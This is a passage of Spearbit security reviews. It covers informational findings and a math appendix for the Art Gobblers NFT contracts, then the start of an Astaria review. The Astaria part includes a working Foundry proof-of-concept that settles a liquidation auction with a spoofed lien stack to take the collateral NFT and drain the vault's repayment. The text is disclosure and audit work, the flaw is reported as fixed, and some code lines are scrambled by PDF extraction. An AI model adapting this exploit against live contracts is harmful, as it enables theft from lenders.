not minted token Severity: Informational Context: Pages.sol#L207-L211 Description: The current implementation of tokenURI in Pages is returning an empty string if the pageId specified by the user's input has not been minted yet (pageId > currentId). Additionally, the function does not correctly handle the case of a special tokenId equal to 0, which is an invalid token ID given that the first mintable token would be the one with ID equal to 1. The EIP-721 documentation specifies that the contract should revert in this case: Throws if _tokenId is not a valid NFT. URIs are defined in RFC 3986. Recommendation: When the specified pageId has not been minted yet or is invalid, make the tokenURI revert instead of returning an empty string. ArtGobblers: Fixed in commit 3494802. Spearbit: Acknowledged. +5.3.4 Consider checking if the token fed to the Gobbler is a real ERC1155 or ERC721 token Severity: Informational Context: ArtGobblers.sol#L672-L674 Description: The current implementation of ArtGobblers.feedArt function allows users to specify from the value of the bool isERC1155 input parameter if the id passed is from an ERC721 or ERC1155 type of token. Without checking if the passed nft address fully support ERC721 or ERC1155 these two problems could arise: • The user can feed to a Gobbler an arbitrary ERC20 token by calling gobblers.feedArt(1, address(goo), 100, false);. In this example, we have fed 100 $GOO to the gobbler. • By just implementing safeTransferFrom or transferFrom in a generic contract, the user can feed tokens that cannot later be rendered by a Dapp because they do not fully support ERC721 or ERC1155 standard. Recommendation: Consider checking if the specified nft address passed by the user as an input parameter is a valid ERC721 or ERC1155 token. 9 +5.3.5 Rounding down in legendary auction leads to legendaryGobblerPrice being zero earlier than the auction interval Severity: Informational Context: ArtGobblers.sol#L443 Description: The expression below rounds down. startPrice * (LEGENDARY_AUCTION_INTERVAL - numMintedSinceStart)) / LEGENDARY_AUCTION_INTERVAL In particular, this expression has a value 0 when numMintedSinceStart is between 573 and 581 (LEGENDARY_- AUCTION_INTERVAL). Recommendation: Consider checking if this is intentional. If not, consider rounding up to the nearest integer so that the legendary gobbler price is only zero after the interval LEGENDARY_AUCTION_INTERVAL. Art Gobblers: Fixed in dc7340a. Spearbit: Acknowledged. +5.3.6 Typos in code comments or natspec comments Severity: Informational Context: • Pages.sol#L179, Pages.sol#L188, Pages.sol#L205, LogisticVRGDA.sol#L23, VRGDA.sol#L34, ArtGob- blers.sol#L54, ArtGobblers.sol#L745, ArtGobblers.sol#L754, ArtGobblers.sol#L606, ArtGobblers.sol#L871, ArtGobblers.sol#L421, ArtGobblers.sol#L435-L436, ArtGobblers.sol#L518, ArtGobblers.sol#L775 and ArtGobblers.sol#L781 Description: Below is a list of typos encountered in the code base and / or natspec comments: • In both Pages.sol#L179 and Pages.sol#L188 replace compromise with comprise • In Pages.sol#L205 replace pages's URI with page's URI • In LogisticVRGDA.sol#L23 replace effects with affects • In VRGDA.sol#L34 replace actions with auctions • In ArtGobblers.sol#L54, ArtGobblers.sol#L745 and ArtGobblers.sol#L754 replace compromise with comprise • In ArtGobblers.sol#L606 remove the double occurrence of the word state • In ArtGobblers.sol#L871 replace emission's with emission • In ArtGobblers.sol#L421 replace gobblers is minted with gobblers are minted and until all legen- daries been sold with until all legendaries have been sold • In ArtGobblers.sol#L435-L436 replace gobblers where minted with gobblers were minted and if auc- tion has not yet started with if the auction has not yet started • In ArtGobblers.sol#L518 replace overflow we've got bigger problems with overflow, we've got big- ger problems • In ArtGobblers.sol#L775 and ArtGobblers.sol#L781 replace get emission emissionMultiple with get emissionMultiple Recommendation: We suggest fixing the abovementioned typos to improve legibility for the end user and other developers. Art Gobblers: Recommendations implemented in the PR #111. Spearbit: Acknowledged. 10 +5.3.7 Missing natspec comments for contract's constructor, variables or functions Severity: Informational Description: Some of the contract's constructor variables and functions are missing natespec comments. Here is the full list of them: • Pages constructor • Pages getTargetSaleDay function • LibString toString function • MerkleProofLib verify function • SignedWadMath toWadUnsafe function • SignedWadMath unsafeWadMul function • SignedWadMath unsafeWadDiv function • SignedWadMath wadMul function • SignedWadMath wadDiv function • SignedWadMath wadExp function • SignedWadMath wadLn function • SignedWadMath unsafeDiv function • VRGDA constructor • LogisticVRGDA constructor • LogisticVRGDA getTargetDayForNextSale • PostSwitchVRGDA constructor • PostSwitchVRGDA getTargetDayForNextSale • GobblerReserve artGobblers • GobblerReserve constructor • GobblersERC1155B contract is missing natspec's coverage for most of the variables and functions • PagesERC721 contract is missing natspec's coverage for most of the variables and functions • PagesERC721 isApprovedForAll should explicity document the fact that the ArtGobbler contract is always pre-approved • ArtGobblers chainlinkKeyHash variable • ArtGobblers chainlinkFee variable • ArtGobblers constructor • ArtGobblers gobblerPrice miss the @return natspec • ArtGobblers legendaryGobblerPrice miss the @return natspec • ArtGobblers requestRandomSeed miss the @return natspec • ArtGobblers fulfillRandomness miss both the @return and @param natspec • ArtGobblers uri miss the @return natspec • ArtGobblers gooBalance miss the @return natspec • ArtGobblers mintReservedGobblers miss the @return natspec • ArtGobblers getGobblerEmissionMultiple miss the @return natspec 11 • ArtGobblers getUserEmissionMultiple miss the @return natspec • ArtGobblers safeBatchTransferFrom miss all natspec • ArtGobblers safeTransferFrom miss all natspec • ArtGobblers transferUserEmissionMultiple miss @notice natspec Recommendation: Consider adding the missing natspec comments to the above listed items. ArtGobblers: Fixed some of them in PR #111. Spearbit: Acknowledged. +5.3.8 Potential issues due to slippage when minting legendary gobblers Severity: Informational Context: ArtGobblers.sol#L358-L360 Description: The price of a legendary mint is a function of the number of gobblers minted from goo. Because of the strict check that the price is exactly equal to the number of gobblers supplied, this can lead to slippage issues. That is, if there is a transaction that gets mined in the same block as a legendary mint, and before the call to mintLegendaryGobbler, the legendary mint will revert. uint256 cost = legendaryGobblerPrice(); if (gobblerIds.length != cost) revert IncorrectGobblerAmount(cost); Recommendation: Consider making the check less strict. - if (gobblerIds.length != cost) revert IncorrectGobblerAmount(cost); + if (gobblerIds.length < cost) revert IncorrectGobblerAmount(cost); Note: the loop that follows as well as the event also must be updated accordingly. Art Gobblers: You could assume that anyone doing a legendary mint is probably using flashbots anyways, but we'd like this to be sound regardless. Fixed in PR #112. Spearbit: Acknowledged. +5.3.9 Users who claim early have an advantage in goo production Severity: Informational Context: ArtGobblers.sol#L287 Description: The gobblers are revealed in ascending order of the index in revealGobblers. However, there can be cases when this favours users who were able to claim early: 1. There is the trivial case where a user who claimed a day earlier will have an advantage in gooBalance as their emission starts earlier. 2. For users who claimed the gobblers on the same day (in the same period between a reveal) the advantage depends on whether the gobblers are revealed in the same block or not. 1. If there is a large number of gobbler claims between two aforementioned gobblers, then it may not be possible to call revealGobblers, due to block gas limit. 2. A user at the beginning of the reveal queue may call revealGobblers for enough indices to reveal their gobbler early. In all of the above cases, the advantage is being early to start the emission of the Goo. Recommendation: We recommend the project to call revealGobblers with the largest possible number that can fit in the block. Similarly, we recommend calling revealGobblers as soon as fulfillRandomness is called. 12 +5.3.10 Add a negativity check for decayConstant in the constructor Severity: Informational Context: VRGDA.sol#L26 Description: Price is designed to decay as time progresses. For this, it is important that the constant decayCon- stant is negative. Since the value is derived using an on-chain logarithm computation once, it is useful to check that the value is negative. Also, typically decay constant is positive, for example, in radioactive decay the negative sign is explicitly added in the function. It is worth keeping the same convention here, i.e., keep decayConstant as a positive number and add the negative sign in getPrice function. However, this may cause a small increase in gas and therefore may not be worth implementing in the end. Recommendation: Consider adding the following change. decayConstant = wadLn(1e18 - periodPriceDecrease); + assert(decayConstant < 0); +5.3.11 Improvements in toString() Severity: Informational Context: LibString.sol#L31, LibString.sol#L17 and LibString.sol#L10 Description: 1. The current toString function carefully calculates the offsets in such a way that the least significant bit of the offset will contain the 8-byte data corresponding to ASCII value of the number. Instead, we recommend simplifying the for loop by using mstore8. 2. There is a redundant mstore(str, k) at the beginning of the loop that can be removed. 3. Consider marking the assembly block as memory-safe and setting the version pragma to at least 0.8.13. This will allow the IR optimizer to lift stack variables to memory if a "stack-too-deep" error is encountered. Art Gobblers: The suggestions (1) and (2) are implemented in LibString.sol from Solmate. Spearbit: Acknowledged. +5.3.12 Consideration on possible Chainlink integration concerns Severity: Informational Context: ArtGobblers.sol#L485 and ArtGobblers.sol#L489-L496 Description: The ArtGobbler project relies on the Chainlink v1 VRF service to reveal minted gobblers and assign a random emissionMultiple that can range from 6 to 9. The project has estimated that minting and revealing all gobblers will take about 10 years. In the scenario simulated by the discussion "Test to mint and reveal all the gobblers" the number of requestRan- domSeed and fulfillRandomness made to reveal all the minted gobblers were more than 1500. Given the timespan of the project, the number of requests made to Chainlink to request a random number and the fundamental dependency that Chainlink VRF v1 has, we would like to highlight some concerns: • What would happen if Chainlink completely discontinues the Chainlink VRF v1? At the current moment, Chainlink has already released VRF v2 that replaces and enhances VRF v1. • What would happen in case of a Chainlink service outage and for some reason they decide not to pro- cess previous requests? Currently, the ArtGobbler contract does not allow to request a new "request for randomness". 13 • What if the fulfillRandomness always gets delayed by a long number of days and users are not able to reveal their gobblers? This would not allow them to know the value of the gobbler (rarity and the visual representation) and start compounding $GOO given the fact that the gobbler does not have an emission multiple associated yet. • What if for error or on purpose (malicious behavior) a Chainlink operator calls fulfillRandomness multi- ple times changing the randomSeed during a reveal phase (the reveal of X gobbler can happen in multiple stages)? Recommendation: Given the important dependency that Chainlink VRF v1 has for the project, we suggest evalu- ating the scenarios listed above and verify with the Chainlink team what are the possible security countermeasures to take. ArtGobblers: Fixed in PR #114. Spearbit: Acknowledged. +5.3.13 The function toString() does not return a string aligned to a 32-byte word boundary Severity: Informational Context: LibString.sol#L38 Description: It is a good practice to align memory regions to 32-byte word boundaries. This is not necessarily the case here. However, we do not think this can lead to issues. Recommendation: Consider changing the string conversion algorithm so that the starting string (and correspond- ingly, the end) will be at 32-byte word boundaries. +5.3.14 Considerations on Legendary Gobbler price mechanics Severity: Informational Context: ArtGobblers.sol#L408 and ArtGobblers.sol#L418-L445 Description: The auction price model is made in a way that starts from a startPrice and decays over time. Each time a new action starts the price time will be equal to max(69, prevStartPrice * 2). Users in this case are incentivized to buy the legendary gobbler as soon as the auction starts because by doing so they are going to burn the maximum amount allowed of gobblers, allowing them to maximize the final emission multiple of the minted legendary gobbler. By doing this, you reach the end goal of maximizing the account's $GOO emissions. By waiting, the cost price of the legendary gobbler decays, and it also decays the emission multiple (because you can burn fewer gobblers). This means that if a user has enough gobblers to burn, he/she will burn them as soon as the auction starts. Another reason to mint a legendary gobbler as soon as the auction starts (and so burn as many gobblers as possible) is to make the next auction starting price as high as possible (always for the same reason, to be able to maximize the legendary gobbler emissions multiple). The next auction starting price is determined by legendaryGobblerAuctionData.startPrice = uint120(cost < 35 ? 69 : cost << 1); These mechanisms and behaviors can result in the following consequences: • Users that will have a huge number of gobblers will burn them as soon as possible, disallowing others that can't afford it to wait for the price to decay. • There will be less and less "normal" gobblers available to be used as part of the "art" aspect of the project. In the discussion "Test to mint and reveal all the gobblers" we have simulated a scenario in which a whale would be interested to collect all gobblers with the end goal of maximizing $GOO production. In that scenario, when the last Legendary Gobbler is minted we have estimated that 9644 gobbler have been burned to mint all the legendaries. 14 Recommendation: If the following scenarios don't fit your expected behavior consider tweaking the current leg- endary gobbler price mechanics to avoid them. • Most of the gobblers will be burned to mint the legendary gobblers. • Only users that own a large number of gobblers can afford to mint legendary gobblers. +5.3.15 Define a LEGENDARY_GOBBLER_INITIAL_START_PRICE constant to be used instead of hardcoded 69 Severity: Informational Context: ArtGobblers.sol#L274 and ArtGobblers.sol#L408 Description: 69 is currently the starting price of the first legendary auction and will also be the price of the next auction if the previous one (that just finished) was lower than 35. There isn't any gas benefit to use a constant variable but it would make the code cleaner and easier to read instead of having hard-coded values directly. Recommendation: Consider creating a uint256 public constant LEGENDARY_GOBBLER_INITIAL_START_PRICE = 69; and replace it where the value 69 is currently hard-coded inside the code. ArtGobblers: Fixed in commit a51fca1. Spearbit: Acknowledged. +5.3.16 Update ArtGobblers comments about some variable/functions to make them more clear Severity: Informational Context: ArtGobblers.sol#L123, ArtGobblers.sol#L169, ArtGobblers.sol#L397 and ArtGobblers.sol#L435-L437 Description: Some comments about state variables or functions could be improved to make them clearer or remove any further doubts. LEGENDARY_AUCTION_INTERVAL /// @notice Legendary auctions begin each time a multiple of these many gobblers have been minted. It could make sense that this comment specifies "minted from Goo" otherwise someone could think that also the "free" mints (mintlist, legendary, reserved) could count to determine when a legendary auction start. EmissionData.lastTimestamp // Timestamp of last deposit or withdrawal. These comments should be updated to cover all the scenarios where lastBalance and lastTimestamp are up- dated. Currently, they are updated in many more cases for example: • mintLegendaryGobbler • revealGobblers • transferUserEmissionMultiple getGobblerData[gobblerId].emissionMultiple = uint48(burnedMultipleTotal << 1) has an outdated comment. The current present in the mintLegendaryGobbler function has the following comment: line getGobblerData[gobblerId].emissionMultiple = uint48(burnedMultipleTotal << 1) // Must be done before minting as the transfer hook will update the user's emissionMultiple. In both ArtGobblers and GobblersERC1155B there isn't any transfer hook, which could mean that the referred comment is referencing outdated code. We suggest removing or updating the comment to reflect the current code implementation. legendaryGobblerPrice numMintedAtStart calculation. 15 The variable numMintedAtStart is calculated as (numSold + 1) * LEGENDARY_AUCTION_INTERVAL The comment above the formula does not explain why it uses (numSold + 1) instead of numSold. This reason is correctly explained by a comment on LEGENDARY_AUCTION_INTERVAL declaration. It would be better to also update the comment related to the calculation of numMintedAtStart to explain why the current formula use (numSold + 1) instead of just numSold transferUserEmissionMultiple The above utility function transfers an amount of a user's emission's multiple to another user. Other than transfer- ring that emission amount, it also updates both users lastBalance and lastTimestamp The natspec comment should be updated to cover this information. Recommendation: Consider updating the referenced comments or removing the outdated ones to improve clarity. ArtGobblers: Fixed in PR #111. Spearbit: Acknowledged. +5.3.17 Mark functions not called internally as external to improve code quality Severity: Informational Context: Goo.sol#L51, Goo.sol#L58, Goo.sol#L65 and GobblerReserve.sol#L30 Description: The following functions could be declared as external to save gas and improve code quality: • Goo.mintForGobblers • Goo.burnForGobblers • Goo.burnForPages • GobblerReserve.withdraw Recommendation: Consider declaring those functions as external to save gas and improve code quality. Art Gobblers: Recommendation implemented in PR 111. Spearbit: Acknowledged. 16 6 Appendix 6.1 Goo production when pooling gobblers The goo emitted ((cid:1)s) for duration (cid:1)t is given by (cid:1)s = 1 4 m(cid:1)t 2 + ps m(cid:1)t (cid:1) (cid:16) (cid:17) Assume there are two gobblers, 1 and 2, with corresponding goo being s1 and s2. Consider the strategy of combining the two gobblers into a single account. We want to see if this strategy improves goo production as opposed to using them separately. (cid:1)s1 = (cid:1)s2 = 1 4 1 4 (cid:16) (cid:16) m1(cid:1)t 2 + ps1 m2(cid:1)t 2 (cid:17) (cid:17) + ps2 m1(cid:1)t m2(cid:1)t (cid:1) (cid:1) The difference is the following (cid:1)s = 1 4 (cid:16) (m1 + m2) (cid:1)t 2 + (s1 + s2) (cid:17) p (m1 + m2)(cid:1)t (cid:1) (cid:1)s (cid:0) (cid:1)s1 (cid:0) (cid:1)s2 = (s1 + s2) (cid:16)p (m1 + m2) ps1 m1 (cid:1) (cid:0) ps2 m2 (cid:1) (cid:0) (cid:1) (cid:1)t (cid:1) (cid:17) (1) The equation (1) is always non-zero. To see this, use Cauchy-Schwarz vectors - (x, y) = (ps1, ps2) - (a, b) = (pm1, pm2) x 2 + y 2 j j (cid:1) j a2 + b2 j (cid:21) j ax + by 2 where j The pooling strategy is always better, except when equality holds for Cauchy-Schwarz: this happens when s1 m1 = s2 m2 The above argument can be generalized to n gobblers. In short, pooling gobblers optimizes Goo production. If this was false, users with multiple gobblers would be incentivized to split it across multiple accounts, leading to what’s arguably a bad game dynamic. The above results also hint at strategies to replicate the pooled portfolio using an unpooled portfolio of gobblers. +6.1.1 Formal proof written in SMTLIB and verified using Z3 During the review, we wrote a formal proof of the above that can be proven in Z3. This was unstreamed to the repo and can be found in goo_pooling.smt. +6.1.2 Replicating a pooled portfolio of Gobblers and Goo with an unpooled portfolio Given n accounts 1, n each having a single gobbler with multiple mi and a gobbler balance of si . Assume that there is a total of G Goo that’s available to be distributed among each accounts: we want to compute the optimal allocation of Goo. Let us say that each account i receives s0i amount of Goo, i.e., From the above equation 1, we see that this is equivalent to maximizing the following expression: n i=1 s0i = G. (cid:1) (cid:1) (cid:1) P n si + s0i mi (cid:1) (cid:1) Xi=1 q(cid:0) 17 From Cauchy-Schwarz, the sum is maximized when s1 + s01 m1 = s2 + s02 m2 = (cid:1) (cid:1) (cid:1) = sn + s0n mn = t From this, we can see that And that the share s0i is given by t = n i=1 si + G n i=1 mi P P Xi=1 The value s0i can be negative, which corresponds to taking out Goo from the gobbler! That is, there are cases where the optimal goo production happens when Goo is taken out of an account and sent to a different one. P s0i = mi n i=1 mi n si + G ! (cid:0) si (2) A special case of (2) happens when G = 0. This corresponds to the case where a group redistributes Goo to maximize the total Goo production. The equation (2), in this case can be formulated as: That is, everyone’s Goo amount is proportional to the multiple of the Gobbler. s0i + si = mi n i=1 mi n Xi=1 si ! P We emphasize again that this same optimum can be reached by pooling all Gobblers and Goo in a single account, without having to go through the redistribution. Also note that once the redistribution happens, it continues being optimal as time progresses, which also simplifies the game mechanics. 6.2 Fuzzing the functions wadln and wadexp Solmate’s functions lnWad and expWad were used in ArtGobblers. These functions were implemented by Remco. Since, this was one of the earliest applications of these functions, we built two different fuzzers to compare the implementation against a multi-precision implementation of exponentiation and logarithm. A fast implementation in rust can be found in solmate-math-fuzz. This implementation compares the results of random inputs for ln and exp against a multi precision floating point library in Rust. A relative tolerance was chosen as these are numerical approximations. Also, an implementation that uses foundry and ffi against python was also done. 6.3 The Fisher-Yates shuffle The Gobbler’s multipliers are revealed using an on-chain Fisher-Yates shuffle. We wanted to empirically verify how random these shuffles looked. We wrote some simple simulations for revealing all gobblers and visualized the shuffles in a jupyter notebook shuffles.ipynb. The multipliers 6, 7, 8 and 9 should occur with frequencies multiple 3054, 2618, 2291 and 2027. These numbers where chosen so that the ‘weighted multiplier’ for each of the group is approximately the same, i.e., 6 2027. 2618 2291 3054 9 8 7 (cid:2) (cid:25) (cid:2) (cid:25) (cid:2) (cid:25) (cid:2) Here are two example plots of the distribution of multipliers: 6.4 Empirical analysis of Fixed points in the shuffle It is interesting to look at the number of fixed points in the shuffle and compare them against the expected value of fixed points (i.e., shuffles that keep one of the indices unchained) in a random shuffle. It is known that for a set of n elements, the number of disarrangements (i.e., a shuffle that doesn’t have any fixed points) converges to 1 e (reference). We found that the empirical data matched with this value. Details can be found in shuffles.ipynb. 18 Figure 1: A sample from the distribution of multipliers Figure 2: Another sample from the distribution of the multipliers 19 0510150.02.55.07.510.012.515.017.56789051015200.02.55.07.510.012.515.017.56789 Figure 3: 3D Plot of Page VRGDA Price development, zoomed in at the time of the switch 6.5 The switch in Pages’s VRGDA The issuance of both Gobblers and Pages is based on VRGDAs, however, there’s a limited amount of Gobblers that can be minted while the supply of Pages is infinite. Similarly to Gobblers the issuance schedule is fast at the beginning and then intended to slow down. But for Pages a switch happens at a certain point where issuance becomes linear. One of the concerns here was whether this switch will be smooth, and to determine this, various plots were generated from the contract’s implementation of the VRGDA logic. One can plot this in three-dimensional space: The time that has passed, the amount of Pages minted so far and the price resulting from these two parameters. Zoomed in at the point of the switch, there appeared to be a slight dent. To further investigate this, a two- dimensional chart was plotted with the price fixed at 4.20, which is the target starting price of each Page’s auction. The plot shows how much time has to pass between each sale to reach the intended starting price again. Here the issue became clearly visible: There’s a sudden drop of time during the switch to linear issuance. The smoothness-problem was acknowledged and fixed by changing the Page’s VRGDA parameters. 6.6 Note on solutions of the differential equation The rate of GOO issuance, g(t) : [0, ) 1 ! [0, ) is defined by the boundary value problem: 1 where g(0) = c for some constant c, the initial value of GOO. p g0(t) = g(t) m (cid:1) 20 Figure 4: 2D Plot of time passed until Page price reaches the target again, zoomed in at the time of the switch One of the solutions for the differential equation is g(t) = 1 4 (cid:0) pmt + 2pc 2 (cid:1) However, for c = 0, the above solution is not unique, as g(t) = 0 is also another solution. One can notice that the function pm K > 0 such that for all distinct y0, y1 y is not Lipschitz continuous at y = 0. To see this, assume that there exists a R (without loss of generality, let’s assume that they are also non-negative): (cid:1) 2 pm j (cid:1) y0 (cid:0) y1 j (cid:20) pm (cid:1) pm py0 + py1 (cid:20) K K y0 (cid:1) j (cid:0) y1 j ) (3) However, for any two distinct Reals y0, y1 satisfying py < pm If the range of g is in (", means that there is a unique solution for the differential equation for such cases due to Picard–Lindelöf theorem. ) for some " > 0, it is straightforward to see that pm 2K , the inequality (3) is false. g is Lipschitz continuous, which 1 (cid:1) 6.7 About legendary gobbler mints without revealing gobblers Apart from the issues mentioned in findings, Spearbit left a comment in the shared GitHub repo that mintLe- gendaryGobbler allows using un-revealed gobblers to mint legendary gobblers, and uses the multiplier value of 0 for such cases. This may not be ideal in some cases. The art-gobblers team commented that (paraphrasing): This is great thinking but I think we’re probably ok with the current functionality. Like if there’s an arms race for legendary gobblers we might not want ppl to have to wait until 4:20 to have their gobblers revealed before they can use them to snatch up the legendary. But, I’ll check with others in team just to be sure. 21 Yeah, the team is also on the side of keeping as is. 6.8 Changing Gobbler NFT from ERC-1155 to ERC-721 After the Spearbit review, the Gobbler NFT was changed from ERC-1155 to ERC-721 (see PR #144). This intro- duced a very subtle bug: the approvals in ERC-1155 standard (isApprovedForAll) indexes on the owner of the NFT, whereas, approvals in ERC-721 indexes on the NFT id. This means that, a destructive action on the NFT, such as burning the gobblers to mint a legendary will need to remove this approval. However, this was missed in the refactor, which allows these approved and burned tokens to be resurrected, breaking the protocol. This bug wasn’t present in original ERC-1155 implementation due to the subtle difference in how approvals are made. 22 diff --git a/findings_newupdate/spearbit/Astaria-Spearbit-Security-Review-July.txt b/findings_newupdate/spearbit/Astaria-Spearbit-Security-Review-July.txt new file mode 100644 index 0000000..50fed53 --- /dev/null +++ b/findings_newupdate/spearbit/Astaria-Spearbit-Security-Review-July.txt @@ -0,0 +1,77 @@ +5.1.1 The extra data (encoded stack) provided to advanced orders to Seaport are not validated properly by the CollateralToken upon callback Severity: Critical Risk Context: • CollateralToken.sol#L125 • CollateralToken.sol#L145-L148 • CollateralToken.sol#L150-L152 • CollateralToken.sol#L175 Description: The extra data (encoded stack) provided to advanced orders to Seaport are not validated properly by the CollateralToken upon callback when validateOrder(...) order is called by Seaport. When a stack/lien gets liquidated an auction is created on Seaport with the offerer and zone set as the Col- lateralToken and the order type is full restricted so that the aforementioned call back is performed at the end of fulfilment/matching orders on Seaport. An extra piece of information which needs to be provided by the fulfiller or matcher on Seaport is the extra data which is the encoded stack. The only validation that happens during the call back is the following to make sure that the 1st consideration's token matches with the decoded stack's lien's token: ERC20 paymentToken = ERC20(zoneParameters.consideration[0].token); if (address(paymentToken) != stack.lien.token) { revert InvalidPaymentToken(); } Besides that one does not check that this stack corresponds to the same collateralId with the same lien id. So a bidder on Seaport can take advantage of this and provide a spoofed extra data as follows: 1. The borrower collateralises its NFT token and takes a lien from a public vault 2. The lien expires and a liquidator calls liquidate(...) for the corresponding stack. 3. The bidder creates a private vault and deposits 1 wei worth of WETH into it. 4. The bidder collateralises a fake NFT token and takes a lien with 1 wei worth of WETH as a loan 5. The bidder provides the encoded fake stack from the step 4 as an extra data to settle the auction for the real liquidated lien from step 2 on Seaport. The net result from these steps are that • The original NFT token will be owned by the bidder. • The change in the sum of the ETH and WETH balances of the borrower, liquidator and the bidder would be the original borrowed amount from step 1. (might be off by a few wei due to division errors when calculating the liquidator fees). • The original public vault would not receive its loan amount from the borrower or the auction amount the Seaport liquidation auction. If the borrower, the liquidator and the bidder were the same, this entity would end up with its original NFT token plus the loaned amount from the original public vault. If the liquidator and the bidder were the same, the bidder would end up with the original NFT token and might have to pay around 1 wei due to division errors. The borrower gets to keep its loan. The public vault would not receive the loan or any portion of the amount settled in the liquidation auction. The following diff in the test contracts is needed for the PoC to work: 5 diff --git a/src/test/TestHelpers.t.sol b/src/test/TestHelpers.t.sol index fab5fbd..5c9bfc8 100644 --- a/src/test/TestHelpers.t.sol +++ b/src/test/TestHelpers.t.sol @@ -163,7 +163,6 @@ contract ConsiderationTester is BaseSeaportTest, AmountDeriver { vm.label(address(this), "testContract"); } } - contract TestHelpers is Deploy, ConsiderationTester { using CollateralLookup for address; using Strings2 for bytes; @@ -1608,7 +1607,7 @@ contract TestHelpers is Deploy, ConsiderationTester { orders, new CriteriaResolver[](0), fulfillments, address(this) incomingBidder.bidder - + ); } else { consideration.fulfillAdvancedOrder( @@ -1621,7 +1620,7 @@ contract TestHelpers is Deploy, ConsiderationTester { ), new CriteriaResolver[](0), bidderConduits[incomingBidder.bidder].conduitKey, address(this) incomingBidder.bidder - + ); } delete fulfillments; The PoC: forge t --mt testScenario9 --ffi -vvv // add the following test case to // file: src/test/LienTokenSettlementScenarioTest.t.sol // Scenario 8: commitToLien -> liquidate -> settle Seaport auction with mismtaching stack as an ,! extraData function testScenario9() public { TestNFT nft = new TestNFT(1); address tokenContract = address(nft); uint256 tokenId = uint256(0); vm.label(address(this), "borrowerContract"); { // create a PublicVault with a 14-day epoch address publicVault = _createPublicVault( strategistOne, strategistTwo, 14 days, 1e17 ); vm.label(publicVault, "Public Vault"); // lend 10 ether to the PublicVault as address(1) _lendToVault( Lender({addr: address(1), amountToLend: 10 ether}), payable(publicVault) 6 ); WETH9.balanceOf(publicVault)); emit log_named_uint("Public vault WETH balance before commiting to a lien", ,! emit log_named_uint("borrower ETH balance before commiting to a lien", address(this).balance); emit log_named_uint("borrower WETH balance before commiting to a lien", ,! WETH9.balanceOf(address(this))); // borrow 10 eth against the dummy NFT with tokenId 0 (, ILienToken.Stack memory stack) = _commitToLien({ vault: payable(publicVault), strategist: strategistOne, strategistPK: strategistOnePK, tokenContract: tokenContract, tokenId: tokenId, lienDetails: ILienToken.Details({ maxAmount: 50 ether, rate: (uint256(1e16) * 150) / (365 days), duration: 10 days, maxPotentialDebt: 0 ether, liquidationInitialAsk: 100 ether }), amount: 10 ether }); assertEq( nft.ownerOf(tokenId), address(COLLATERAL_TOKEN), "The bidder did not receive the collateral token after the auction end." ); WETH9.balanceOf(publicVault)); emit log_named_uint("Public vault WETH balance after commiting to a lien", ,! emit log_named_address("NFT token owner", nft.ownerOf(tokenId)); emit log_named_uint("borrower ETH balance after commiting to a lien", address(this).balance); emit log_named_uint("borrower WETH balance after commiting to a lien", ,! WETH9.balanceOf(address(this))); uint256 collateralId = tokenContract.computeId(tokenId); // verify the strategist has no shares minted assertEq( PublicVault(payable(publicVault)).balanceOf(strategistOne), 0, "Strategist has incorrect share balance" ); // verify that the borrower has the CollateralTokens assertEq( COLLATERAL_TOKEN.ownerOf(collateralId), address(this), "CollateralToken not minted to borrower" ); // fast forward to the end of the lien one vm.warp(block.timestamp + 10 days); address liquidatorOne = vm.addr(0x1195da7051); vm.label(liquidatorOne, "liquidator 1"); // liquidate the lien vm.startPrank(liquidatorOne); 7 emit log_named_uint("liquidator WETH balance before liquidation", WETH9.balanceOf(liquidatorOne)); OrderParameters memory listedOrder = _liquidate(stack); vm.stopPrank(); assertEq( LIEN_TOKEN.getAuctionLiquidator(collateralId), liquidatorOne, "liquidator is not stored in s.collateralLiquidator[collateralId]" ); // --- start of the attack --- vm.label(bidder, "bidder"); vm.startPrank(bidder); TestNFT fakeNFT = new TestNFT(1); address fakeTokenContract = address(fakeNFT); uint256 fakeTokenId = uint256(0); vm.stopPrank(); address privateVault = _createPrivateVault( bidder, bidder ); vm.label(privateVault, "Fake Private Vault"); _lendToPrivateVault( PrivateLender({ addr: bidder, amountToLend: 1 wei, token: address(WETH9) }), payable(privateVault) ); vm.startPrank(bidder); // it is important that the fakeStack.lien.token is the same as the original stack's token // below deals 1 wei to the bidder which is also the fakeStack borrower (, ILienToken.Stack memory fakeStack) = _commitToLien({ vault: payable(privateVault), strategist: bidder, strategistPK: bidderPK, tokenContract: fakeTokenContract, tokenId: fakeTokenId, lienDetails: ILienToken.Details({ maxAmount: 1 wei, rate: 1, // needs to be non-zero duration: 1 hours, // s.minLoanDuration maxPotentialDebt: 0 ether, liquidationInitialAsk: 1 wei }), amount: 1 wei }); emit log_named_uint("CollateralToken WETH balance before auction end", ,! WETH9.balanceOf(address(COLLATERAL_TOKEN))); // _bid deals 300 ether to the bidder _bid( Bidder({bidder: bidder, bidderPK: bidderPK}), listedOrder, // order paramters created for the original stack during the liquidation 100 ether, // stack.lien.details.liquidationInitialAsk 8 fakeStack ); emit log_named_uint("Public vault WETH balance after auction end", WETH9.balanceOf(publicVault)); emit log_named_uint("borrower WETH balance after auction end", WETH9.balanceOf(address(this))); emit log_named_uint("liquidator WETH balance after auction end", WETH9.balanceOf(liquidatorOne)); emit log_named_uint("bidder WETH balance after auction end", WETH9.balanceOf(bidder)); emit log_named_uint("bidder ETH balance before commiting to a lien", address(bidder).balance); emit log_named_uint("CollateralToken WETH balance after auction end", ,! emit log_named_address("bidder", bidder); emit log_named_address("owner of the original collateral after auction end", ,! WETH9.balanceOf(address(COLLATERAL_TOKEN))); nft.ownerOf(tokenId)); // _removeLien is not called for collateralId assertEq( LIEN_TOKEN.getAuctionLiquidator(collateralId), liquidatorOne, "_removeLien is called for collateralId" ); // WETH balance of the public vault is still 0 even after the auction assertEq( WETH9.balanceOf(publicVault), 0 ); } assertEq( nft.ownerOf(tokenId), bidder, "The bidder did not receive the collateral token after the auction end." ); } Recommendation: address(this) make sure In validateOrder(...) in the 1st if branch when zoneParameters.offerer == 1. stack.lien.collaterlId == collateralId (collateralId) 2. It might be check cak256(abi.encode(stack)) == keccak256(zoneParameters.extraData). But requirement will be checked in makePayment(...) LIEN_TOKEN.getCollateralState(collateralId) == kec- is satisfied this good if 1. also to Astaria: Fixed in PR 334 below by checking stack.lien.collaterlId == collateralId. Spearbit: Fixed. +5.1.2 AstariaRouter.liquidate(...) can be called multiple times for an expired lien/stack Severity: Critical Risk Context: • AstariaRouter.sol#L681 • CollateralToken.sol#L530-L532 • LienToken.sol#L171-L174 • PublicVault.sol#L656-L661 • PublicVault.sol#L655 9 Description: The current implementation of the protocol does not have any safeguard around calling Astari- aRouter.liquidate(...) only once for an 